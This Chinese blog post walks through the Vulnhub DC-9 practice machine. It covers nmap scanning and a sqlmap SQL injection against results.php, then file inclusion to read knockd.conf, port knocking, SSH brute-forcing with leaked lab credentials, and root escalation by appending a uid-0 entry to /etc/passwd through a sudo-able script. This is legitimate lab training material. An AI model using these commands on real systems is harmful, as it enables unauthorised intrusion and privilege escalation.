Vulnhub靶机DC系列-DC-9

最新推荐文章于 2023-06-16 16:49:03 发布
最新推荐文章于 2023-06-16 16:49:03 发布
阅读量2.6k 收藏 3
点赞数 2
分类专栏: DC 笔记 文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54525483/article/details/122469694
版权
笔记 同时被 2 个专栏收录
16 篇文章 1 订阅
订阅专栏
DC
9 篇文章 1 订阅
订阅专栏

Vulnhub靶机DC系列-DC-9

靶场环境

靶场名称:DC-9
靶场地址:https://www.vulnhub.com/entry/dc-9,412/

下载地址:
DC-9.zip (Size: 700 MB)
Download: http://www.five86.com/downloads/DC-9.zip
Download (Mirror): https://download.vulnhub.com/dc/DC-9.zip
Download (Torrent): https://download.vulnhub.com/dc/DC-9.zip.torrent(Magnet)

VMware->文件->打开->选中 .ova 文件,导入,会提示导入失败,点重试就完事了(双击.ova好像就直接导入了-_-)

打开DC靶机(网络适配器看一下是不是NAT模式,不然扫不出来)

DC系列最后一台靶机

信息收集

kali攻击机网段:192.168.210.0/24
nmap 扫一下DC-9靶机的网段

namp -sn x.x.x.x/x
  • 靶机DC-9 IP:192.168.210.148
  • kali:192.168.210.137

nmap扫描一下靶机的端口信息、系统信息等等。

nmap -O -sV -p- 192.168.210.148

在这里插入图片描述22端口不是open
访问页面
在这里插入图片描述在这里插入图片描述
扫描目录
在这里插入图片描述

获得权限

页面有一个查询,URL没有数据判断是个POST请求,bp抓包
在这里插入图片描述在这里插入图片描述存在SQL注入,sqlmap跑一下

sqlmap -u "http://192.168.210.148/results.php" --data="search=1" --batch --dbs

在这里插入图片描述
依次查库、查表、查列,最后两个库得到:
在这里插入图片描述

在这里插入图片描述
第一想法就是md5
在这里插入图片描述

  • admin
  • transorbital1

看到这个‘file does not exits’,疑似文件包含

在这里插入图片描述最终通过爆破发现knockd.conf,看一下/etc/knockd.conf文件中的自定义端口
在这里插入图片描述有3个自定义端口7469,8475,9842,根据Port-knocking的规则依次访问这三个端口就可以打开SSH服务了

nmap -p 7469 192.168.210.148
nmap -p 8475 192.168.210.148
nmap -p 9842 192.168.210.148

在这里插入图片描述在这里插入图片描述

将前面所爆出来的那些员工的账号和密码编写成两个字典,进行ssh爆破
在这里插入图片描述爆破出来有2个用户可用,chandlerb\UrAG0D!、joeyt\Passw0rd
什么都没改再跑了一次,又出了一个,玄学
在这里插入图片描述
janitor\Ilovepeepee
依次ssh连接,在janitor家目录下找到另一个密码字典
在这里插入图片描述再次爆破
在这里插入图片描述
ssh连接

  • fredf/B4-Tru3-001

在这里插入图片描述
可提权

尝试执行发现是python文件
在这里插入图片描述
使用find查找test.py文件

find /  -name test.py 2>/dev/null

在这里插入图片描述
查看文件

cat /usr/lib/python3/dist-packages/setuptools/command/test.py
cat /opt/devstuff/test.py

在这里插入图片描述
在这里插入图片描述
看else后面,./test命令有两参数,文件1,文件2
文件1以‘r’打开,读取内容到output,文件2以’a’,append打开
把output追加到文件2

构造passwd的参数

openssl passwd -1 -salt admin 123456

 openssl是一个安全套接字层密码库,囊括主要的密码算法、常用密钥、证书封装管理功能及实现ssl协议
-1 的意思是使用md5加密算法
-salt 自动插入一个随机数作为文件内容加密
admin 123456 用户名和密码

在这里插入图片描述

$1$admin$LClYcRe.ee8dQwgrFc5nz.

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
# 用户名:密码:uid:gid:家目录:登陆后使用的shell

在这里插入图片描述

sudo ./test /tmp/passwd /etc/passwd

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Green_Hand_01
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulhub-DC-9靶场实战攻略
weixin_51339377的博客
03-17 427
首先正常通过arp-scan进行主机发现 然后nmap扫描得到开放端口 之后访问界面 各种尝试后猜测search界面存在sql注入 接下来通过burp抓包 修改search的参数 为了看清到底有没有报错出现 可以通过搜索正确的内容 例如Mary用于后期判断闭合以及是否注入 search=Mary' order by 6 --+ search=Mary' order by 7 --+ search=Mary' union select 1,2,3,4,5,6 -...
Vulnhub靶场实战---DC-9
一期一会的博客
12-23 2259
​ 0x00 环境准备 1.官网下载地址: https://www.vulnhub.com/entry/dc-9,412/ 2.下载完成之后直接导入vm,使用NAT模式连接,保持在同一网段 攻击机:kali (192.168.88.130) 靶机DC-8 (192.168.88.132) 0x01 信息收集 老办法,使用arp-scan -l 找到目标主机,目标主机ip为192.168.88.132 查看开放端口,22端口被过滤,登录80端口查看 nmap -sV -p- -A 192.168.88.
靶场练习第十七天~vulnhub靶场之dc-9
qq_57976347的博客
02-16 807
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-9.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.122 2.网站的信息收集 (1)靶机开放了80端口,先访问
靶机10 DC-9(过程超详细)
honest_gg的博客
10-09 2485
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
DC-9靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-09 4093
dc-9靶场详细渗透过程
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub DC-9
Pai_Space
04-11 3073
明确:《中华人民共和国网络安全法》 Description DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The ultimate goal of this challenge is to get root and to read the one and only flag. Linux skill..
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 2821
Vulnhub靶机渗透学习——DC-9
vulnhub靶场渗透练习详解——DC9
weixin_51011609的博客
08-19 2009
vulnhub靶场渗透练习详解——DC9
DC-9靶机渗透测试详细教程
啊醒的博客
05-04 2606
DC-8靶机渗透测试详细教程
vulnhub-dc9靶场渗透
最新发布
大熊
06-16 159
通过这次打靶场学习和巩固到的知识:1. 在nmap信息收集扫描端口时,需要注意端口的开放状态。2. sql注入漏洞的发现和利用。3. 通过参数Fuzz隐藏的参数到发现文件包含漏洞并进行利用。4. knock:端口敲门服务的利用,通过依次访问目标端口,触发knock服务的规则,开启相应的端口,从而进一步的利用。5. 通过Sudo -l查看是否有高权限可执行文件,并分析进一步利用进行提权等。
vulnhub DC9 靶场练习
鸥鹭忘机
09-05 1685
前言 这次练习的靶机vulnhub平台下的DC系列靶机第9台,也是最后一台。下载地址为https://www.vulnhub.com/entry/dc-9,412/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机的难度为中等,其关键点是需要知道knockd服务。建议在挑战该靶机之前了解一下knockd服务。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-9靶机,然后选中配置。依次点击网络配置->NAT模式->
渗透DC-9靶机
告白的博客
07-29 372
0x00 环境介绍 DC-9考点为SQL注入,密码爆破 小黄按照做完的思路做一下笔记,其中的弯路就不放在上面了 0x01 信息收集 1)IP收集 使用arp协议扫描彧存活靶机 arp-scan -l 2)端口扫描 nmap -A -p- 192.168.213.147 进入web页面继续收集 查看源码 0x02 渗透测试 这里存在sql注入使用sqlmap进行注入,通过源码查看到交互页面为results.php 指定注入目标 sqlmap.py -u "http://192.168.213.14
DC-9 vulnhub靶场详细通关记录
weixin_62621015的博客
03-03 325
vulnhub靶场 DC-9个人通关记录 补充了很多细节和知识点,可以参考一下
vulnhub靶场,DC-9
kukudeshuo的博客
07-17 827
vulnhub靶场,DC-9 环境准备 攻击机:kali(192.168.58.130) 靶机DC-9(192.168.58.155) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.155 使用nmap扫描查看目标靶机端口开放情况 可以看到扫描结果是开放了22、80端口,但是22端口被过滤了 浏览器访问目标靶机80端口 使用浏览器插件wappal
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值